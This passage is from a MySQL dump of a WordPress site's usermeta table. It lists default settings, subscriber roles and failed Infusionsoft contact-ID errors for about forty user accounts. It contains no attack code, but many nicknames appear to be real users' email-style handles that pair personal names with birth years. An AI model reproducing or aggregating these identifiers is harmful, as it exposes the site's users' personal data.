(19798, 1514, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19799, 1514, 'cyb_user_level', '0'),
(19800, 1514, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19801, 1514, 'default_password_nag', '1'),
(19802, 1515, 'nickname', 'tandser1951'),
(19803, 1515, 'first_name', ''),
(19804, 1515, 'last_name', ''),
(19805, 1515, 'description', ''),
(19806, 1515, 'rich_editing', 'true'),
(19807, 1515, 'comment_shortcuts', 'false'),
(19808, 1515, 'admin_color', 'fresh'),
(19809, 1515, 'use_ssl', '0'),
(19810, 1515, 'show_admin_bar_front', 'true'),
(19811, 1515, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19812, 1515, 'cyb_user_level', '0'),
(19813, 1515, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19814, 1515, 'default_password_nag', '1'),
(19815, 1516, 'nickname', 'coryperago2005'),
(19816, 1516, 'first_name', ''),
(19817, 1516, 'last_name', ''),
(19818, 1516, 'description', ''),
(19819, 1516, 'rich_editing', 'true'),
(19820, 1516, 'comment_shortcuts', 'false'),
(19821, 1516, 'admin_color', 'fresh'),
(19822, 1516, 'use_ssl', '0'),
(19823, 1516, 'show_admin_bar_front', 'true'),
(19824, 1516, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19825, 1516, 'cyb_user_level', '0'),
(19826, 1516, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19827, 1516, 'default_password_nag', '1'),
(19828, 1517, 'nickname', 'jackvitale681956'),
(19829, 1517, 'first_name', ''),
(19830, 1517, 'last_name', ''),
(19831, 1517, 'description', ''),
(19832, 1517, 'rich_editing', 'true'),
(19833, 1517, 'comment_shortcuts', 'false'),
(19834, 1517, 'admin_color', 'fresh'),
(19835, 1517, 'use_ssl', '0'),
(19836, 1517, 'show_admin_bar_front', 'true'),
(19837, 1517, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19838, 1517, 'cyb_user_level', '0'),
(19839, 1517, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19840, 1517, 'default_password_nag', '1'),
(19841, 1518, 'nickname', 'mandymichelebrown1956'),
(19842, 1518, 'first_name', ''),
(19843, 1518, 'last_name', ''),
(19844, 1518, 'description', ''),
(19845, 1518, 'rich_editing', 'true'),
(19846, 1518, 'comment_shortcuts', 'false'),
(19847, 1518, 'admin_color', 'fresh'),
(19848, 1518, 'use_ssl', '0'),
(19849, 1518, 'show_admin_bar_front', 'true'),
(19850, 1518, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19851, 1518, 'cyb_user_level', '0'),
(19852, 1518, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19853, 1518, 'default_password_nag', '1'),
(19854, 1519, 'nickname', 'patti.kinsella1958'),
(19855, 1519, 'first_name', ''),
(19856, 1519, 'last_name', ''),
(19857, 1519, 'description', ''),
(19858, 1519, 'rich_editing', 'true'),
(19859, 1519, 'comment_shortcuts', 'false'),
(19860, 1519, 'admin_color', 'fresh'),
(19861, 1519, 'use_ssl', '0'),
(19862, 1519, 'show_admin_bar_front', 'true'),
(19863, 1519, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19864, 1519, 'cyb_user_level', '0'),
(19865, 1519, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19866, 1519, 'default_password_nag', '1'),
(19867, 1520, 'nickname', 'mhenry821992'),
(19868, 1520, 'first_name', ''),
(19869, 1520, 'last_name', ''),
(19870, 1520, 'description', ''),
(19871, 1520, 'rich_editing', 'true'),
(19872, 1520, 'comment_shortcuts', 'false'),
(19873, 1520, 'admin_color', 'fresh'),
(19874, 1520, 'use_ssl', '0'),
(19875, 1520, 'show_admin_bar_front', 'true'),
(19876, 1520, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19877, 1520, 'cyb_user_level', '0'),
(19878, 1520, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19879, 1520, 'default_password_nag', '1'),
(19880, 1521, 'nickname', 'jtothepmclaughlan1981'),
(19881, 1521, 'first_name', ''),
(19882, 1521, 'last_name', ''),
(19883, 1521, 'description', ''),
(19884, 1521, 'rich_editing', 'true'),
(19885, 1521, 'comment_shortcuts', 'false'),
(19886, 1521, 'admin_color', 'fresh'),
(19887, 1521, 'use_ssl', '0'),
(19888, 1521, 'show_admin_bar_front', 'true'),
(19889, 1521, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19890, 1521, 'cyb_user_level', '0'),
(19891, 1521, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19892, 1521, 'default_password_nag', '1'),
(19893, 1522, 'nickname', 'bentoulis1983'),
(19894, 1522, 'first_name', ''),
(19895, 1522, 'last_name', ''),
(19896, 1522, 'description', ''),
(19897, 1522, 'rich_editing', 'true'),
(19898, 1522, 'comment_shortcuts', 'false'),
(19899, 1522, 'admin_color', 'fresh'),
(19900, 1522, 'use_ssl', '0'),
(19901, 1522, 'show_admin_bar_front', 'true'),
(19902, 1522, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19903, 1522, 'cyb_user_level', '0'),
(19904, 1522, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19905, 1522, 'default_password_nag', '1'),
(19906, 1523, 'nickname', 'bj10251986'),
(19907, 1523, 'first_name', ''),
(19908, 1523, 'last_name', ''),
(19909, 1523, 'description', ''),
(19910, 1523, 'rich_editing', 'true'),
(19911, 1523, 'comment_shortcuts', 'false'),
(19912, 1523, 'admin_color', 'fresh'),
(19913, 1523, 'use_ssl', '0'),
(19914, 1523, 'show_admin_bar_front', 'true'),
(19915, 1523, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19916, 1523, 'cyb_user_level', '0'),
(19917, 1523, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19918, 1523, 'default_password_nag', '1'),
(19919, 1524, 'nickname', 'daisypearlgirl1963'),
(19920, 1524, 'first_name', ''),
(19921, 1524, 'last_name', ''),
(19922, 1524, 'description', ''),
(19923, 1524, 'rich_editing', 'true'),
(19924, 1524, 'comment_shortcuts', 'false'),
(19925, 1524, 'admin_color', 'fresh'),
(19926, 1524, 'use_ssl', '0'),
(19927, 1524, 'show_admin_bar_front', 'true'),
(19928, 1524, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19929, 1524, 'cyb_user_level', '0'),
(19930, 1524, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19931, 1524, 'default_password_nag', '1'),
(19932, 1525, 'nickname', 'steffies.email1985'),
(19933, 1525, 'first_name', ''),
(19934, 1525, 'last_name', ''),
(19935, 1525, 'description', ''),
(19936, 1525, 'rich_editing', 'true'),
(19937, 1525, 'comment_shortcuts', 'false'),
(19938, 1525, 'admin_color', 'fresh'),
(19939, 1525, 'use_ssl', '0'),
(19940, 1525, 'show_admin_bar_front', 'true'),
(19941, 1525, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19942, 1525, 'cyb_user_level', '0'),
(19943, 1525, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19944, 1525, 'default_password_nag', '1'),
(19945, 1526, 'nickname', 'brooklyn.blair1977'),
(19946, 1526, 'first_name', ''),
(19947, 1526, 'last_name', ''),
(19948, 1526, 'description', ''),
(19949, 1526, 'rich_editing', 'true'),
(19950, 1526, 'comment_shortcuts', 'false'),
(19951, 1526, 'admin_color', 'fresh'),
(19952, 1526, 'use_ssl', '0'),
(19953, 1526, 'show_admin_bar_front', 'true'),
(19954, 1526, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19955, 1526, 'cyb_user_level', '0'),
(19956, 1526, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19957, 1526, 'default_password_nag', '1'),
(19958, 1527, 'nickname', 'thomas2008'),
(19959, 1527, 'first_name', ''),
(19960, 1527, 'last_name', ''),
(19961, 1527, 'description', ''),
(19962, 1527, 'rich_editing', 'true'),
(19963, 1527, 'comment_shortcuts', 'false'),
(19964, 1527, 'admin_color', 'fresh'),
(19965, 1527, 'use_ssl', '0'),
(19966, 1527, 'show_admin_bar_front', 'true'),
(19967, 1527, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19968, 1527, 'cyb_user_level', '0'),
(19969, 1527, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19970, 1527, 'default_password_nag', '1'),
(19971, 1528, 'nickname', 'redrage8281988'),
(19972, 1528, 'first_name', ''),
(19973, 1528, 'last_name', ''),
(19974, 1528, 'description', ''),
(19975, 1528, 'rich_editing', 'true'),
(19976, 1528, 'comment_shortcuts', 'false'),
(19977, 1528, 'admin_color', 'fresh'),
(19978, 1528, 'use_ssl', '0'),
(19979, 1528, 'show_admin_bar_front', 'true'),
(19980, 1528, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19981, 1528, 'cyb_user_level', '0'),
(19982, 1528, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19983, 1528, 'default_password_nag', '1'),
(19984, 1529, 'nickname', 'rockymtns7771979'),
(19985, 1529, 'first_name', ''),
(19986, 1529, 'last_name', ''),
(19987, 1529, 'description', ''),
(19988, 1529, 'rich_editing', 'true'),
(19989, 1529, 'comment_shortcuts', 'false'),
(19990, 1529, 'admin_color', 'fresh'),
(19991, 1529, 'use_ssl', '0'),
(19992, 1529, 'show_admin_bar_front', 'true'),
(19993, 1529, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(19994, 1529, 'cyb_user_level', '0'),
(19995, 1529, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(19996, 1529, 'default_password_nag', '1'),
(19997, 1530, 'nickname', 'quentinsmomma1965'),
(19998, 1530, 'first_name', ''),
(19999, 1530, 'last_name', ''),
(20000, 1530, 'description', ''),
(20001, 1530, 'rich_editing', 'true'),
(20002, 1530, 'comment_shortcuts', 'false'),
(20003, 1530, 'admin_color', 'fresh'),
(20004, 1530, 'use_ssl', '0'),
(20005, 1530, 'show_admin_bar_front', 'true'),
(20006, 1530, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20007, 1530, 'cyb_user_level', '0'),
(20008, 1530, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20009, 1530, 'default_password_nag', '1'),
(20010, 1531, 'nickname', 'aaron.thieret1998'),
(20011, 1531, 'first_name', ''),
(20012, 1531, 'last_name', ''),
(20013, 1531, 'description', ''),
(20014, 1531, 'rich_editing', 'true'),
(20015, 1531, 'comment_shortcuts', 'false'),
(20016, 1531, 'admin_color', 'fresh'),
(20017, 1531, 'use_ssl', '0'),
(20018, 1531, 'show_admin_bar_front', 'true'),
(20019, 1531, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20020, 1531, 'cyb_user_level', '0'),
(20021, 1531, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20022, 1531, 'default_password_nag', '1'),
(20023, 1532, 'nickname', 'elias_lopez951993'),
(20024, 1532, 'first_name', ''),
(20025, 1532, 'last_name', ''),
(20026, 1532, 'description', ''),
(20027, 1532, 'rich_editing', 'true'),
(20028, 1532, 'comment_shortcuts', 'false'),
(20029, 1532, 'admin_color', 'fresh'),
(20030, 1532, 'use_ssl', '0'),
(20031, 1532, 'show_admin_bar_front', 'true'),
(20032, 1532, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20033, 1532, 'cyb_user_level', '0'),
(20034, 1532, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20035, 1532, 'default_password_nag', '1'),
(20036, 1533, 'nickname', 'zugo631978'),
(20037, 1533, 'first_name', ''),
(20038, 1533, 'last_name', ''),
(20039, 1533, 'description', ''),
(20040, 1533, 'rich_editing', 'true'),
(20041, 1533, 'comment_shortcuts', 'false'),
(20042, 1533, 'admin_color', 'fresh'),
(20043, 1533, 'use_ssl', '0'),
(20044, 1533, 'show_admin_bar_front', 'true'),
(20045, 1533, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20046, 1533, 'cyb_user_level', '0'),
(20047, 1533, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20048, 1533, 'default_password_nag', '1'),
(20049, 1534, 'nickname', 'joecopplestone2001'),
(20050, 1534, 'first_name', ''),
(20051, 1534, 'last_name', ''),
(20052, 1534, 'description', ''),
(20053, 1534, 'rich_editing', 'true');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(20054, 1534, 'comment_shortcuts', 'false'),
(20055, 1534, 'admin_color', 'fresh'),
(20056, 1534, 'use_ssl', '0'),
(20057, 1534, 'show_admin_bar_front', 'true'),
(20058, 1534, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20059, 1534, 'cyb_user_level', '0'),
(20060, 1534, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20061, 1534, 'default_password_nag', '1'),
(20062, 1535, 'nickname', 'eliza41171997'),
(20063, 1535, 'first_name', ''),
(20064, 1535, 'last_name', ''),
(20065, 1535, 'description', ''),
(20066, 1535, 'rich_editing', 'true'),
(20067, 1535, 'comment_shortcuts', 'false'),
(20068, 1535, 'admin_color', 'fresh'),
(20069, 1535, 'use_ssl', '0'),
(20070, 1535, 'show_admin_bar_front', 'true'),
(20071, 1535, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20072, 1535, 'cyb_user_level', '0'),
(20073, 1535, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20074, 1535, 'default_password_nag', '1'),
(20075, 1536, 'nickname', 'lorettaalberghina1973'),
(20076, 1536, 'first_name', ''),
(20077, 1536, 'last_name', ''),
(20078, 1536, 'description', ''),
(20079, 1536, 'rich_editing', 'true'),
(20080, 1536, 'comment_shortcuts', 'false'),
(20081, 1536, 'admin_color', 'fresh'),
(20082, 1536, 'use_ssl', '0'),
(20083, 1536, 'show_admin_bar_front', 'true'),
(20084, 1536, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20085, 1536, 'cyb_user_level', '0'),
(20086, 1536, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20087, 1536, 'default_password_nag', '1'),
(20088, 1537, 'nickname', 'jakehollenbeck2008'),
(20089, 1537, 'first_name', ''),
(20090, 1537, 'last_name', ''),
(20091, 1537, 'description', ''),
(20092, 1537, 'rich_editing', 'true'),
(20093, 1537, 'comment_shortcuts', 'false'),
(20094, 1537, 'admin_color', 'fresh'),
(20095, 1537, 'use_ssl', '0'),
(20096, 1537, 'show_admin_bar_front', 'true'),
(20097, 1537, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20098, 1537, 'cyb_user_level', '0'),
(20099, 1537, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20100, 1537, 'default_password_nag', '1'),
(20101, 1538, 'nickname', 'dugdale1999'),
(20102, 1538, 'first_name', ''),
(20103, 1538, 'last_name', ''),
(20104, 1538, 'description', ''),
(20105, 1538, 'rich_editing', 'true'),
(20106, 1538, 'comment_shortcuts', 'false'),
(20107, 1538, 'admin_color', 'fresh'),
(20108, 1538, 'use_ssl', '0'),
(20109, 1538, 'show_admin_bar_front', 'true'),
(20110, 1538, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20111, 1538, 'cyb_user_level', '0'),
(20112, 1538, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20113, 1538, 'default_password_nag', '1'),
(20114, 1539, 'nickname', 'tracyb1151969'),
(20115, 1539, 'first_name', ''),
(20116, 1539, 'last_name', ''),
(20117, 1539, 'description', ''),
(20118, 1539, 'rich_editing', 'true'),
(20119, 1539, 'comment_shortcuts', 'false'),
(20120, 1539, 'admin_color', 'fresh'),
(20121, 1539, 'use_ssl', '0'),
(20122, 1539, 'show_admin_bar_front', 'true'),
(20123, 1539, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20124, 1539, 'cyb_user_level', '0'),
(20125, 1539, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20126, 1539, 'default_password_nag', '1'),
(20127, 1540, 'nickname', 'krazow1956'),
(20128, 1540, 'first_name', ''),
(20129, 1540, 'last_name', ''),
(20130, 1540, 'description', ''),
(20131, 1540, 'rich_editing', 'true'),
(20132, 1540, 'comment_shortcuts', 'false'),
(20133, 1540, 'admin_color', 'fresh'),
(20134, 1540, 'use_ssl', '0'),
(20135, 1540, 'show_admin_bar_front', 'true'),
(20136, 1540, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20137, 1540, 'cyb_user_level', '0'),
(20138, 1540, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20139, 1540, 'default_password_nag', '1'),
(20140, 1541, 'nickname', 'martinez.nathalie911979'),
(20141, 1541, 'first_name', ''),
(20142, 1541, 'last_name', ''),
(20143, 1541, 'description', ''),
(20144, 1541, 'rich_editing', 'true'),
(20145, 1541, 'comment_shortcuts', 'false'),
(20146, 1541, 'admin_color', 'fresh'),
(20147, 1541, 'use_ssl', '0'),
(20148, 1541, 'show_admin_bar_front', 'true'),
(20149, 1541, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20150, 1541, 'cyb_user_level', '0'),
(20151, 1541, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20152, 1541, 'default_password_nag', '1'),
(20153, 1542, 'nickname', 'etjames2001'),
(20154, 1542, 'first_name', ''),
(20155, 1542, 'last_name', ''),
(20156, 1542, 'description', ''),
(20157, 1542, 'rich_editing', 'true'),
(20158, 1542, 'comment_shortcuts', 'false'),
(20159, 1542, 'admin_color', 'fresh'),
(20160, 1542, 'use_ssl', '0'),
(20161, 1542, 'show_admin_bar_front', 'true'),
(20162, 1542, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20163, 1542, 'cyb_user_level', '0'),
(20164, 1542, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20165, 1542, 'default_password_nag', '1'),
(20166, 1543, 'nickname', 'whenweescape1964'),
(20167, 1543, 'first_name', ''),
(20168, 1543, 'last_name', ''),
(20169, 1543, 'description', ''),
(20170, 1543, 'rich_editing', 'true'),
(20171, 1543, 'comment_shortcuts', 'false'),
(20172, 1543, 'admin_color', 'fresh'),
(20173, 1543, 'use_ssl', '0'),
(20174, 1543, 'show_admin_bar_front', 'true'),
(20175, 1543, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20176, 1543, 'cyb_user_level', '0'),
(20177, 1543, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20178, 1543, 'default_password_nag', '1'),
(20179, 1544, 'nickname', 'phildempsy1968'),
(20180, 1544, 'first_name', ''),
(20181, 1544, 'last_name', ''),
(20182, 1544, 'description', ''),
(20183, 1544, 'rich_editing', 'true'),
(20184, 1544, 'comment_shortcuts', 'false'),
(20185, 1544, 'admin_color', 'fresh'),
(20186, 1544, 'use_ssl', '0'),
(20187, 1544, 'show_admin_bar_front', 'true'),
(20188, 1544, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20189, 1544, 'cyb_user_level', '0'),
(20190, 1544, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20191, 1544, 'default_password_nag', '1'),
(20192, 1545, 'nickname', 'michael.mcgovern1974'),
(20193, 1545, 'first_name', ''),
(20194, 1545, 'last_name', ''),
(20195, 1545, 'description', ''),
(20196, 1545, 'rich_editing', 'true'),
(20197, 1545, 'comment_shortcuts', 'false'),
(20198, 1545, 'admin_color', 'fresh'),
(20199, 1545, 'use_ssl', '0'),
(20200, 1545, 'show_admin_bar_front', 'true'),
(20201, 1545, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20202, 1545, 'cyb_user_level', '0'),
(20203, 1545, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20204, 1545, 'default_password_nag', '1'),
(20205, 1546, 'nickname', 'nandy_millette1973'),
(20206, 1546, 'first_name', ''),
(20207, 1546, 'last_name', ''),
(20208, 1546, 'description', ''),
(20209, 1546, 'rich_editing', 'true'),
(20210, 1546, 'comment_shortcuts', 'false'),
(20211, 1546, 'admin_color', 'fresh'),
(20212, 1546, 'use_ssl', '0'),
(20213, 1546, 'show_admin_bar_front', 'true'),
(20214, 1546, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20215, 1546, 'cyb_user_level', '0'),
(20216, 1546, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20217, 1546, 'default_password_nag', '1'),
(20218, 1547, 'nickname', 'meshell_dawson1990'),
(20219, 1547, 'first_name', ''),
(20220, 1547, 'last_name', ''),
(20221, 1547, 'description', ''),
(20222, 1547, 'rich_editing', 'true'),
(20223, 1547, 'comment_shortcuts', 'false'),
(20224, 1547, 'admin_color', 'fresh'),
(20225, 1547, 'use_ssl', '0'),
(20226, 1547, 'show_admin_bar_front', 'true'),
(20227, 1547, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20228, 1547, 'cyb_user_level', '0'),
(20229, 1547, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20230, 1547, 'default_password_nag', '1'),
(20231, 1548, 'nickname', 'jumkie751987'),
(20232, 1548, 'first_name', ''),
(20233, 1548, 'last_name', ''),
(20234, 1548, 'description', ''),
(20235, 1548, 'rich_editing', 'true'),
(20236, 1548, 'comment_shortcuts', 'false'),
(20237, 1548, 'admin_color', 'fresh'),
(20238, 1548, 'use_ssl', '0'),
(20239, 1548, 'show_admin_bar_front', 'true'),
(20240, 1548, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20241, 1548, 'cyb_user_level', '0'),
(20242, 1548, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20243, 1548, 'default_password_nag', '1'),
(20244, 1549, 'nickname', 'gmikih1976'),
(20245, 1549, 'first_name', ''),
(20246, 1549, 'last_name', ''),
(20247, 1549, 'description', ''),
(20248, 1549, 'rich_editing', 'true'),
(20249, 1549, 'comment_shortcuts', 'false'),
(20250, 1549, 'admin_color', 'fresh'),
(20251, 1549, 'use_ssl', '0'),
(20252, 1549, 'show_admin_bar_front', 'true'),
(20253, 1549, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20254, 1549, 'cyb_user_level', '0'),
(20255, 1550, 'nickname', 'chefbenrd1999'),
(20256, 1550, 'first_name', ''),
(20257, 1550, 'last_name', ''),
(20258, 1550, 'description', ''),
(20259, 1550, 'rich_editing', 'true'),
(20260, 1550, 'comment_shortcuts', 'false'),
(20261, 1550, 'admin_color', 'fresh'),
(20262, 1550, 'use_ssl', '0'),
(20263, 1550, 'show_admin_bar_front', 'true'),
(20264, 1550, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20265, 1550, 'cyb_user_level', '0'),
(20266, 1549, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20267, 1549, 'default_password_nag', '1'),
(20268, 1550, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20269, 1550, 'default_password_nag', '1'),
(20270, 1551, 'nickname', 'arodak5151982'),
(20271, 1551, 'first_name', ''),
(20272, 1551, 'last_name', ''),
(20273, 1551, 'description', ''),
(20274, 1551, 'rich_editing', 'true'),
(20275, 1551, 'comment_shortcuts', 'false'),
(20276, 1551, 'admin_color', 'fresh'),
(20277, 1551, 'use_ssl', '0'),
(20278, 1551, 'show_admin_bar_front', 'true'),
(20279, 1551, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(20280, 1551, 'cyb_user_level', '0'),
(20281, 1551, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(20282, 1551, 'default_password_nag', '1'),
(20283, 1552, 'nickname', 'patiogallerynaples1988'),
(20284, 1552, 'first_name', ''),
(20285, 1552, 'last_name', ''),
